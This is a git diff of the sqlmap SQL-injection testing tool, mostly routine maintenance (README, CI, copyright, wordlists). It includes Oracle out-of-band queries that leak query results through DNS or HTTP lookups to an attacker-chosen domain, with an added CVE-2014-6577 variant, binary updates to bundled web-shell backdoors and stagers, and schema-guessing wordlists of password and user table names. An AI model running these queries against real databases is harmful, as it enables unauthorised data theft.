diff --git a/.gitattributes b/.gitattributes index dd5ba8f8848..a99321d231b 100644 --- a/.gitattributes +++ b/.gitattributes @@ -1,8 +1,16 @@ *.conf text eol=lf +*.json text eol=lf +*.html text eol=lf *.md text eol=lf *.md5 text eol=lf +*.pl text eol=lf *.py text eol=lf +*.sh text eol=lf +*.sql text eol=lf +*.txt text eol=lf *.xml text eol=lf +*.yaml text eol=lf +*.yml text eol=lf LICENSE text eol=lf COMMITMENT text eol=lf diff --git a/.github/FUNDING.yml b/.github/FUNDING.yml index 41c825ab207..e6b299956eb 100644 --- a/.github/FUNDING.yml +++ b/.github/FUNDING.yml @@ -1 +1 @@ -custom: 'https://www.paypal.com/donate?hosted_button_id=A34GMDLKA2V7G' +github: sqlmapproject diff --git a/.github/ISSUE_TEMPLATE/bug_report.md b/.github/ISSUE_TEMPLATE/bug_report.md index b7753a2553d..0a2d0fe4aea 100644 --- a/.github/ISSUE_TEMPLATE/bug_report.md +++ b/.github/ISSUE_TEMPLATE/bug_report.md @@ -21,10 +21,10 @@ A clear and concise description of what you expected to happen. If applicable, add screenshots to help explain your problem. **Running environment:** - - sqlmap version [e.g. 1.3.5.93#dev] - - Installation method [e.g. git] - - Operating system: [e.g. Microsoft Windows 10] - - Python version [e.g. 3.5.2] + - sqlmap version [e.g. 1.7.2.12#dev] + - Installation method [e.g. pip] + - Operating system: [e.g. Microsoft Windows 11] + - Python version [e.g. 3.11.2] **Target details:** - DBMS [e.g. Microsoft SQL Server] diff --git a/.github/workflows/tests.yml b/.github/workflows/tests.yml index acb3cacae7b..0ecd5cd3fbc 100644 --- a/.github/workflows/tests.yml +++ b/.github/workflows/tests.yml @@ -10,7 +10,10 @@ jobs: strategy: matrix: os: [ubuntu-latest, macos-latest, windows-latest] - python-version: [ '2.x', '3.10', 'pypy-2.7', 'pypy-3.7' ] + python-version: [ 'pypy-2.7', '3.13' ] + exclude: + - os: macos-latest + python-version: 'pypy-2.7' steps: - uses: actions/checkout@v2 - name: Set up Python diff --git a/.pylintrc b/.pylintrc deleted file mode 100644 index 631dcdd9110..00000000000 --- a/.pylintrc +++ /dev/null @@ -1,546 +0,0 @@ -# Based on Apache 2.0 licensed code from https://github.com/ClusterHQ/flocker - -[MASTER] - -# Specify a configuration file. -#rcfile= - -# Python code to execute, usually for sys.path manipulation such as -# pygtk.require(). -init-hook="from pylint.config import find_pylintrc; import os, sys; sys.path.append(os.path.dirname(find_pylintrc()))" - -# Add files or directories to the blacklist. They should be base names, not -# paths. -ignore= - -# Pickle collected data for later comparisons. -persistent=no - -# List of plugins (as comma separated values of python modules names) to load, -# usually to register additional checkers. -load-plugins= - -# Use multiple processes to speed up Pylint. -# DO NOT CHANGE THIS VALUES >1 HIDE RESULTS!!!!! -jobs=1 - -# Allow loading of arbitrary C extensions. Extensions are imported into the -# active Python interpreter and may run arbitrary code. -unsafe-load-any-extension=no - -# A comma-separated list of package or module names from where C extensions may -# be loaded. Extensions are loading into the active Python interpreter and may -# run arbitrary code -extension-pkg-whitelist= - -# Allow optimization of some AST trees. This will activate a peephole AST -# optimizer, which will apply various small optimizations. For instance, it can -# be used to obtain the result of joining multiple strings with the addition -# operator. Joining a lot of strings can lead to a maximum recursion error in -# Pylint and this flag can prevent that. It has one side effect, the resulting -# AST will be different than the one from reality. -optimize-ast=no - - -[MESSAGES CONTROL] - -# Only show warnings with the listed confidence levels. Leave empty to show -# all. Valid levels: HIGH, INFERENCE, INFERENCE_FAILURE, UNDEFINED -confidence= - -# Enable the message, report, category or checker with the given id(s). You can -# either give multiple identifier separated by comma (,) or put this option -# multiple time. See also the "--disable" option for examples. -disable=all - -enable=import-error, - import-self, - reimported, - wildcard-import, - misplaced-future, - deprecated-module, - unpacking-non-sequence, - invalid-all-object, - undefined-all-variable, - used-before-assignment, - cell-var-from-loop, - global-variable-undefined, - redefine-in-handler, - unused-import, - unused-wildcard-import, - global-variable-not-assigned, - undefined-loop-variable, - global-at-module-level, - bad-open-mode, - redundant-unittest-assert, - boolean-datetime - deprecated-method, - anomalous-unicode-escape-in-string, - anomalous-backslash-in-string, - not-in-loop, - continue-in-finally, - abstract-class-instantiated, - star-needs-assignment-target, - duplicate-argument-name, - return-in-init, - too-many-star-expressions, - nonlocal-and-global, - return-outside-function, - return-arg-in-generator, - invalid-star-assignment-target, - bad-reversed-sequence, - nonexistent-operator, - yield-outside-function, - init-is-generator, - nonlocal-without-binding, - lost-exception, - assert-on-tuple, - dangerous-default-value, - duplicate-key, - useless-else-on-loop - expression-not-assigned, - confusing-with-statement, - unnecessary-lambda, - pointless-statement, - pointless-string-statement, - unnecessary-pass, - unreachable, - using-constant-test, - bad-super-call, - missing-super-argument, - slots-on-old-class, - super-on-old-class, - property-on-old-class, - not-an-iterable, - not-a-mapping, - format-needs-mapping, - truncated-format-string, - missing-format-string-key, - mixed-format-string, - too-few-format-args, - bad-str-strip-call, - too-many-format-args, - bad-format-character, - format-combined-specification, - bad-format-string-key, - bad-format-string, - missing-format-attribute, - missing-format-argument-key, - unused-format-string-argument - unused-format-string-key, - invalid-format-index, - bad-indentation, - mixed-indentation, - unnecessary-semicolon, - lowercase-l-suffix, - invalid-encoded-data, - unpacking-in-except, - import-star-module-level, - long-suffix, - old-octal-literal, - old-ne-operator, - backtick, - old-raise-syntax, - metaclass-assignment, - next-method-called, - dict-iter-method, - dict-view-method, - indexing-exception, - raising-string, - using-cmp-argument, - cmp-method, - coerce-method, - delslice-method, - getslice-method, - hex-method, - nonzero-method, - t-method, - setslice-method, - old-division, - logging-format-truncated, - logging-too-few-args, - logging-too-many-args, - logging-unsupported-format, - logging-format-interpolation, - invalid-unary-operand-type, - unsupported-binary-operation, - not-callable, - redundant-keyword-arg, - assignment-from-no-return, - assignment-from-none, - not-context-manager, - repeated-keyword, - missing-kwoa, - no-value-for-parameter, - invalid-sequence-index, - invalid-slice-index, - unexpected-keyword-arg, - unsupported-membership-test, - unsubscriptable-object, - access-member-before-definition, - method-hidden, - assigning-non-slot, - duplicate-bases, - inconsistent-mro, - inherit-non-class, - invalid-slots, - invalid-slots-object, - no-method-argument, - no-self-argument, - unexpected-special-method-signature, - non-iterator-returned, - arguments-differ, - signature-differs, - bad-staticmethod-argument, - non-parent-init-called, - bad-except-order, - catching-non-exception, - bad-exception-context, - notimplemented-raised, - raising-bad-type, - raising-non-exception, - misplaced-bare-raise, - duplicate-except, - nonstandard-exception, - binary-op-exception, - not-async-context-manager, - yield-inside-async-function - -# Needs investigation: -# abstract-method (might be indicating a bug? probably not though) -# protected-access (requires some refactoring) -# attribute-defined-outside-init (requires some refactoring) -# super-init-not-called (requires some cleanup) - -# Things we'd like to enable someday: -# redefined-builtin (requires a bunch of work to clean up our code first) -# redefined-outer-name (requires a bunch of work to clean up our code first) -# undefined-variable (re-enable when pylint fixes https://github.com/PyCQA/pylint/issues/760) -# no-name-in-module (giving us spurious warnings https://github.com/PyCQA/pylint/issues/73) -# unused-argument (need to clean up or code a lot, e.g. prefix unused_?) -# function-redefined (@overload causes lots of spurious warnings) -# too-many-function-args (@overload causes spurious warnings... I think) -# parameter-unpacking (needed for eventual Python 3 compat) -# print-statement (needed for eventual Python 3 compat) -# filter-builtin-not-iterating (Python 3) -# map-builtin-not-iterating (Python 3) -# range-builtin-not-iterating (Python 3) -# zip-builtin-not-iterating (Python 3) -# many others relevant to Python 3 -# unused-variable (a little work to cleanup, is all) - -# ... -[REPORTS] - -# Set the output format. Available formats are text, parseable, colorized, msvs -# (visual studio) and html. You can also give a reporter class, eg -# mypackage.mymodule.MyReporterClass. -output-format=parseable - -# Put messages in a separate file for each module / package specified on the -# command line instead of printing them on stdout. Reports (if any) will be -# written in a file name "pylint_global.[txt|html]". -files-output=no - -# Tells whether to display a full report or only the messages -reports=no - -# Python expression which should return a note less than 10 (10 is the highest -# note). You have access to the variables errors warning, statement which -# respectively contain the number of errors / warnings messages and the total -# number of statements analyzed. This is used by the global evaluation report -# (RP0004). -evaluation=10.0 - ((float(5 * error + warning + refactor + convention) / statement) * 10) - -# Template used to display messages. This is a python new-style format string -# used to format the message information. See doc for all details -#msg-template= - - -[LOGGING] - -# Logging modules to check that the string format arguments are in logging -# function parameter format -logging-modules=logging - - -[FORMAT] - -# Maximum number of characters on a single line. -max-line-length=100 - -# Regexp for a line that is allowed to be longer than the limit. -ignore-long-lines=^\s*(# )??$ - -# Allow the body of an if to be on the same line as the test if there is no -# else. -single-line-if-stmt=no - -# List of optional constructs for which whitespace checking is disabled. `dict- -# separator` is used to allow tabulation in dicts, etc.: {1 : 1,\n222: 2}. -# `trailing-comma` allows a space between comma and closing bracket: (a, ). -# `empty-line` allows space-only lines. -no-space-check=trailing-comma,dict-separator - -# Maximum number of lines in a module -max-module-lines=1000 - -# String used as indentation unit. This is usually " " (4 spaces) or "\t" (1 -# tab). -indent-string=' ' - -# Number of spaces of indent required inside a hanging or continued line. -indent-after-paren=4 - -# Expected format of line ending, e.g. empty (any line ending), LF or CRLF. -expected-line-ending-format= - - -[TYPECHECK] - -# Tells whether missing members accessed in mixin class should be ignored. A -# mixin class is detected if its name ends with "mixin" (case insensitive). -ignore-mixin-members=yes - -# List of module names for which member attributes should not be checked -# (useful for modules/projects where namespaces are manipulated during runtime -# and thus existing member attributes cannot be deduced by static analysis. It -# supports qualified module names, as well as Unix pattern matching. -ignored-modules=thirdparty.six.moves - -# List of classes names for which member attributes should not be checked -# (useful for classes with attributes dynamically set). This supports can work -# with qualified names. -ignored-classes= - -# List of members which are set dynamically and missed by pylint inference -# system, and so shouldn't trigger E1101 when accessed. Python regular -# expressions are accepted. -generated-members= - - -[VARIABLES] - -# Tells whether we should check for unused import in __init__ files. -init-import=no - -# A regular expression matching the name of dummy variables (i.e. expectedly -# not used). -dummy-variables-rgx=_$|dummy - -# List of additional names supposed to be defined in builtins. Remember that -# you should avoid to define new builtins when possible. -additional-builtins= - -# List of strings which can identify a callback function by name. A callback -# name must start or end with one of those strings. -callbacks=cb_,_cb - - -[SIMILARITIES] - -# Minimum lines number of a similarity. -min-similarity-lines=4 - -# Ignore comments when computing similarities. -ignore-comments=yes - -# Ignore docstrings when computing similarities. -ignore-docstrings=yes - -# Ignore imports when computing similarities. -ignore-imports=no - - -[SPELLING] - -# Spelling dictionary name. Available dictionaries: none. To make it working -# install python-enchant package. -spelling-dict= - -# List of comma separated words that should not be checked. -spelling-ignore-words= - -# A path to a file that contains private dictionary; one word per line. -spelling-private-dict-file= - -# Tells whether to store unknown words to indicated private dictionary in -# --spelling-private-dict-file option instead of raising a message. -spelling-store-unknown-words=no - - -[MISCELLANEOUS] - -# List of note tags to take in consideration, separated by a comma. -notes=FIXME,XXX,TODO - - -[BASIC] - -# List of builtins function names that should not be used, separated by a comma -bad-functions=map,filter,input - -# Good variable names which should always be accepted, separated by a comma -good-names=i,j,k,ex,Run,_ - -# Bad variable names which should always be refused, separated by a comma -bad-names=foo,bar,baz,toto,tutu,tata - -# Colon-delimited sets of names that determine each other's naming style when -# the name regexes allow several styles. -name-group= - -# Include a hint for the correct naming format with invalid-name -include-naming-hint=no - -# Regular expression matching correct function names -function-rgx=[a-z_][a-z0-9_]{2,30}$ - -# Naming hint for function names -function-name-hint=[a-z_][a-z0-9_]{2,30}$ - -# Regular expression matching correct variable names -variable-rgx=[a-z_][a-z0-9_]{2,30}$ - -# Naming hint for variable names -variable-name-hint=[a-z_][a-z0-9_]{2,30}$ - -# Regular expression matching correct constant names -const-rgx=(([A-Z_][A-Z0-9_]*)|(__.*__))$ - -# Naming hint for constant names -const-name-hint=(([A-Z_][A-Z0-9_]*)|(__.*__))$ - -# Regular expression matching correct attribute names -attr-rgx=[a-z_][a-z0-9_]{2,30}$ - -# Naming hint for attribute names -attr-name-hint=[a-z_][a-z0-9_]{2,30}$ - -# Regular expression matching correct argument names -argument-rgx=[a-z_][a-z0-9_]{2,30}$ - -# Naming hint for argument names -argument-name-hint=[a-z_][a-z0-9_]{2,30}$ - -# Regular expression matching correct class attribute names -class-attribute-rgx=([A-Za-z_][A-Za-z0-9_]{2,30}|(__.*__))$ - -# Naming hint for class attribute names -class-attribute-name-hint=([A-Za-z_][A-Za-z0-9_]{2,30}|(__.*__))$ - -# Regular expression matching correct inline iteration names -inlinevar-rgx=[A-Za-z_][A-Za-z0-9_]*$ - -# Naming hint for inline iteration names -inlinevar-name-hint=[A-Za-z_][A-Za-z0-9_]*$ - -# Regular expression matching correct class names -class-rgx=[A-Z_][a-zA-Z0-9]+$ - -# Naming hint for class names -class-name-hint=[A-Z_][a-zA-Z0-9]+$ - -# Regular expression matching correct module names -module-rgx=(([a-z_][a-z0-9_]*)|([A-Z][a-zA-Z0-9]+))$ - -# Naming hint for module names -module-name-hint=(([a-z_][a-z0-9_]*)|([A-Z][a-zA-Z0-9]+))$ - -# Regular expression matching correct method names -method-rgx=[a-z_][a-z0-9_]{2,30}$ - -# Naming hint for method names -method-name-hint=[a-z_][a-z0-9_]{2,30}$ - -# Regular expression which should only match function or class names that do -# not require a docstring. -no-docstring-rgx=^_ - -# Minimum line length for functions/classes that require docstrings, shorter -# ones are exempt. -docstring-min-length=-1 - - -[ELIF] - -# Maximum number of nested blocks for function / method body -max-nested-blocks=5 - - -[IMPORTS] - -# Deprecated modules which should not be used, separated by a comma -deprecated-modules=regsub,TERMIOS,Bastion,rexec - -# Create a graph of every (i.e. internal and external) dependencies in the -# given file (report RP0402 must not be disabled) -import-graph= - -# Create a graph of external dependencies in the given file (report RP0402 must -# not be disabled) -ext-import-graph= - -# Create a graph of internal dependencies in the given file (report RP0402 must -# not be disabled) -int-import-graph= - - -[DESIGN] - -# Maximum number of arguments for function / method -max-args=5 - -# Argument names that match this expression will be ignored. Default to name -# with leading underscore -ignored-argument-names=_.* - -# Maximum number of locals for function / method body -max-locals=15 - -# Maximum number of return / yield for function / method body -max-returns=6 - -# Maximum number of branch for function / method body -max-branches=12 - -# Maximum number of statements in function / method body -max-statements=50 - -# Maximum number of parents for a class (see R0901). -max-parents=7 - -# Maximum number of attributes for a class (see R0902). -max-attributes=7 - -# Minimum number of public methods for a class (see R0903). -min-public-methods=2 - -# Maximum number of public methods for a class (see R0904). -max-public-methods=20 - -# Maximum number of boolean expressions in a if statement -max-bool-expr=5 - - -[CLASSES] - -# List of method names used to declare (i.e. assign) instance attributes. -defining-attr-methods=__init__,__new__,setUp - -# List of valid names for the first argument in a class method. -valid-classmethod-first-arg=cls - -# List of valid names for the first argument in a metaclass class method. -valid-metaclass-classmethod-first-arg=mcs - -# List of member names, which should be excluded from the protected access -# warning. -exclude-protected=_asdict,_fields,_replace,_source,_make - - -[EXCEPTIONS] - -# Exceptions that will emit a warning when being caught. Defaults to -# "Exception" -overgeneral-exceptions=Exception diff --git a/COMMITMENT b/COMMITMENT deleted file mode 100644 index a687e0ddb6f..00000000000 --- a/COMMITMENT +++ /dev/null @@ -1,46 +0,0 @@ -GPL Cooperation Commitment -Version 1.0 - -Before filing or continuing to prosecute any legal proceeding or claim -(other than a Defensive Action) arising from termination of a Covered -License, we commit to extend to the person or entity ('you') accused -of violating the Covered License the following provisions regarding -cure and reinstatement, taken from GPL version 3. As used here, the -term 'this License' refers to the specific Covered License being -enforced. - - However, if you cease all violation of this License, then your - license from a particular copyright holder is reinstated (a) - provisionally, unless and until the copyright holder explicitly - and finally terminates your license, and (b) permanently, if the - copyright holder fails to notify you of the violation by some - reasonable means prior to 60 days after the cessation. - - Moreover, your license from a particular copyright holder is - reinstated permanently if the copyright holder notifies you of the - violation by some reasonable means, this is the first time you - have received notice of violation of this License (for any work) - from that copyright holder, and you cure the violation prior to 30 - days after your receipt of the notice. - -We intend this Commitment to be irrevocable, and binding and -enforceable against us and assignees of or successors to our -copyrights. - -Definitions - -'Covered License' means the GNU General Public License, version 2 -(GPLv2), the GNU Lesser General Public License, version 2.1 -(LGPLv2.1), or the GNU Library General Public License, version 2 -(LGPLv2), all as published by the Free Software Foundation. - -'Defensive Action' means a legal proceeding or claim that We bring -against you in response to a prior proceeding or claim initiated by -you or your affiliate. - -'We' means each contributor to this repository as of the date of -inclusion of this file, including subsidiaries of a corporate -contributor. - -This work is available under a Creative Commons Attribution-ShareAlike -4.0 International license (https://creativecommons.org/licenses/by-sa/4.0/). diff --git a/LICENSE b/LICENSE index a6c9b58d467..4973329375b 100644 --- a/LICENSE +++ b/LICENSE @@ -1,7 +1,7 @@ COPYING -- Describes the terms under which sqlmap is distributed. A copy of the GNU General Public License (GPL) is appended to this file. -sqlmap is (C) 2006-2021 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar. +sqlmap is (C) 2006-2025 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar. This program is free software; you may redistribute and/or modify it under the terms of the GNU General Public License as published by the Free diff --git a/README.md b/README.md index bb7ac3f5a80..777d4aa03dd 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,6 @@ # sqlmap ![](https://i.imgur.com/fe85aVR.png) -[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches including database fingerprinting, over data fetching from the database, accessing the underlying file system, and executing commands on the operating system via out-of-band connections. @@ -20,7 +20,7 @@ Preferably, you can download sqlmap by cloning the [Git](https://github.com/sqlm git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap works out of the box with [Python](http://www.python.org/download/) version **2.6**, **2.7** and **3.x** on any platform. +sqlmap works out of the box with [Python](https://www.python.org/download/) version **2.6**, **2.7** and **3.x** on any platform. Usage ---- @@ -45,28 +45,34 @@ Links * Issue tracker: https://github.com/sqlmapproject/sqlmap/issues * User's manual: https://github.com/sqlmapproject/sqlmap/wiki * Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* X: [@sqlmap](https://x.com/sqlmap) +* Demos: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots Translations ---- +* [Arabic](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ar-AR.md) * [Bulgarian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md) * [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md) * [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md) +* [Dutch](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-nl-NL.md) * [French](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md) -* [German](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-de-GER.md) +* [Georgian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ka-GE.md) +* [German](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-de-DE.md) * [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md) +* [Hindi](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-in-HI.md) * [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md) * [Italian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md) * [Japanese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md) * [Korean](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ko-KR.md) +* [Kurdish (Central)](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ckb-KU.md) * [Persian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fa-IR.md) * [Polish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pl-PL.md) * [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md) -* [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RUS.md) +* [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RU.md) * [Serbian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-rs-RS.md) +* [Slovak](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-sk-SK.md) * [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md) * [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md) * [Ukrainian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-uk-UA.md) diff --git a/data/html/index.html b/data/html/index.html index a2d4dfc4479..576f2763b8c 100644 --- a/data/html/index.html +++ b/data/html/index.html @@ -1,6 +1,6 @@ - + diff --git a/data/procs/oracle/dns_request.sql b/data/procs/oracle/dns_request.sql index adb71cfb2fb..5dda762c08d 100644 --- a/data/procs/oracle/dns_request.sql +++ b/data/procs/oracle/dns_request.sql @@ -1,2 +1,3 @@ SELECT UTL_INADDR.GET_HOST_ADDRESS('%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL # or SELECT UTL_HTTP.REQUEST('http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL +# or (CVE-2014-6577) SELECT EXTRACTVALUE(xmltype(' %remote;]>'),'/l') FROM dual diff --git a/data/shell/backdoors/backdoor.asp_ b/data/shell/backdoors/backdoor.asp_ index 5a81545e020..bc912038c7d 100644 Binary files a/data/shell/backdoors/backdoor.asp_ and b/data/shell/backdoors/backdoor.asp_ differ diff --git a/data/shell/backdoors/backdoor.aspx_ b/data/shell/backdoors/backdoor.aspx_ index 8e83a0d2009..de889b1ed7a 100644 Binary files a/data/shell/backdoors/backdoor.aspx_ and b/data/shell/backdoors/backdoor.aspx_ differ diff --git a/data/shell/backdoors/backdoor.jsp_ b/data/shell/backdoors/backdoor.jsp_ index 8d01202f00f..f798ea5778c 100644 Binary files a/data/shell/backdoors/backdoor.jsp_ and b/data/shell/backdoors/backdoor.jsp_ differ diff --git a/data/shell/backdoors/backdoor.php_ b/data/shell/backdoors/backdoor.php_ index 5db8f130f9b..720bfe1fff4 100644 Binary files a/data/shell/backdoors/backdoor.php_ and b/data/shell/backdoors/backdoor.php_ differ diff --git a/data/shell/stagers/stager.asp_ b/data/shell/stagers/stager.asp_ index 5c235ecb5f4..bd08896ad19 100644 Binary files a/data/shell/stagers/stager.asp_ and b/data/shell/stagers/stager.asp_ differ diff --git a/data/shell/stagers/stager.aspx_ b/data/shell/stagers/stager.aspx_ index f20887a96d6..3694b2c1533 100644 Binary files a/data/shell/stagers/stager.aspx_ and b/data/shell/stagers/stager.aspx_ differ diff --git a/data/shell/stagers/stager.jsp_ b/data/shell/stagers/stager.jsp_ index beec2ae56ae..f70ac6f9efd 100644 Binary files a/data/shell/stagers/stager.jsp_ and b/data/shell/stagers/stager.jsp_ differ diff --git a/data/shell/stagers/stager.php_ b/data/shell/stagers/stager.php_ index eafe6277127..c5103161a7d 100644 Binary files a/data/shell/stagers/stager.php_ and b/data/shell/stagers/stager.php_ differ diff --git a/data/txt/common-columns.txt b/data/txt/common-columns.txt index 1b2d7cbfb01..3c87ef83b4a 100644 --- a/data/txt/common-columns.txt +++ b/data/txt/common-columns.txt @@ -1,4 +1,4 @@ -# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +# Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) # See the file 'LICENSE' for copying permission id @@ -1844,6 +1844,10 @@ banner_id error language_id val +parol +familiya +imya +otchestvo # site:jp @@ -2731,7 +2735,120 @@ ssn account confidential +# site:nl + +naam +straat +gemeente +beschrijving +id_gebruiker +gebruiker_id +gebruikersnaam +wachtwoord +telefoon +voornaam +achternaam +geslacht +huisnummer +gemeente +leeftijd + +# site:cn + +yonghuming +mima +xingming +xingbie +touxiang +youxiang +shouji + # Misc u_pass hashedPw + +# password (international) + +adgangskode +aikotoba +amho +bimilbeonho +codewort +contrasena +contrasenya +contrasinal +esmeramz +facalfare +fjalekalim +focalfaire +gagtnabar +geslo +gozarvazhe +gunho +haslo +heslo +hudyat +igamalokungena +iphasiwedi +javka +jelszo +kadavucol +kalameobur +kalimatumurur +kalimatusirr +kalmarsirri +katalaluan +katasandi +kennwort +kodeord +kodikos +kouling +kupiasoz +kupuhipa +kupukaranga +kupuuru +kupuwhakahipa +losen +losenord +lozinka +lykilord +matkhau +mima +nenosiri +nywila +okwuntughe +oroasina +oroigbaniwole +paeseuwodeu +parol +parola +parolachiave +paroladordine +parole +paroli +parolja +parool +parulle +pasahitza +pasfhocal +pasowardo +passord +passwort +pasuwado +pasvorto +rahatphan +ramzobur +salasana +salasona +santoysena +senha +sifra +sifre +sisma +slaptazodis +synthimatiko +tunnussana +wachtwoord +wachtwurd +wagwoord diff --git a/data/txt/common-files.txt b/data/txt/common-files.txt index c8804441b67..a6b3dc53b19 100644 --- a/data/txt/common-files.txt +++ b/data/txt/common-files.txt @@ -1,4 +1,4 @@ -# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +# Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) # See the file 'LICENSE' for copying permission # CTFs diff --git a/data/txt/common-outputs.txt b/data/txt/common-outputs.txt index a3ea71dac0f..f882a4b1b05 100644 --- a/data/txt/common-outputs.txt +++ b/data/txt/common-outputs.txt @@ -1,4 +1,4 @@ -# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +# Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) # See the file 'LICENSE' for copying permission [Banners] @@ -399,6 +399,7 @@ XDBWEBSERVICES # MySQL information_schema +performance_schema mysql phpmyadmin diff --git a/data/txt/common-tables.txt b/data/txt/common-tables.txt index d09923d87e7..0f2baa69b83 100644 --- a/data/txt/common-tables.txt +++ b/data/txt/common-tables.txt @@ -1,4 +1,4 @@ -# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +# Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) # See the file 'LICENSE' for copying permission users @@ -3420,6 +3420,181 @@ basvuru basvurular kontak kontaklar +kisi +kisiler +uye +uyeler +kayıt +kayıtlar +tel +telefon +telefonlar +numaralar +numara +kart +kartlar +kredi +krediler +kredikartı +fiyat +fiyatlar +odeme +odemeler +kategoriler +tbl_Uye +xml_kategoriler +tbl_siparis +tbl_googlemap +tbl_ilce +tbl_yardim +tbl_Resim +tbl_anket +tbl_Rapor +tbl_statsvisit +tbl_ticket +tbl_Cesit +tbl_xml +tbl_Cinsiyet +xml_urunler_temp +tbl_takvim +tbl_altkategori +tbl_mesaj +tbl_Haber +tbl_AdresTemp +tbl_Firma +tbl_Medya +xml_urunlerbirim +tbl_Yardim +tbl_medya +tbl_Video +xml_markalar_transfer +tbl_adrestemp +tbl_online +tbl_sehir +tbl_resim +tbl_Gorsel +tbl_doviz +tbl_gorsel +tbl_kampanya +tbl_Blog +tbl_Banners +tbl_koleksiyon +tbl_Galeri +tbl_Kampanya +tbl_Favori +tbl_sss +tbl_Banner +tbl_Faq +xml_markalar_temp +tbl_faq +tbl_Personel +tbl_Seo +tbl_adres +tbl_ayar +tbl_metin +tbl_AltKategori +tbl_kategori +tbl_Marka +tbl_blogkategori +tbl_ulke +tbl_sepetold +tbl_yorum +tbl_Fiyat +tbl_Reklam +tbl_Kategori +tbl_Yorum +tbl_semt +tbl_Tedarikci +xml_kampanyakategori +tbl_ozelgun +tbl_uyexml +tbl_rapor +tbl_seo +tbl_Indirim +tbl_Ilce +tbl_bulten +tbl_video +tbl_Ayar +tbl_fatura +tbl_cinsiyet +tbl_reklam +tbl_sliders +tbl_KDV +tbl_uye_img +tbl_siparisid +tbl_BlogKategori +tbl_Yonetici +tbl_kdv +tbl_Online +tbl_temsilci +tbl_Dil +tbl_banners +tbl_Mesaj +tbl_Logs +tbl_logs +tbl_fiyat +tbl_SSS +tbl_Puan +tbl_kargo +tbl_Statsvisit +tbl_Koleksiyon +tbl_dil +tbl_Sepetold +tbl_Fatura +tbl_yonetici +tbl_Yazilar +tbl_Temsilci +tbl_Kargo +tbl_cesit +tbl_uye +tbl_haber +tbl_SiparisID +tbl_Adres +tbl_Ozelgun +tbl_banka +tbl_Videogaleri +tbl_galeri +tbl_videogaleri +xml_urunresimleri +tbl_urun +tbl_Ticket +tbl_yazilar +tbl_Ulke +tbl_Urun +tbl_renk +tbl_Harita +tbl_Sepet +tbl_Sehir +tbl_Uye_Img +tbl_Semt +tbl_indirim +xml_kampanyakategori_transfer 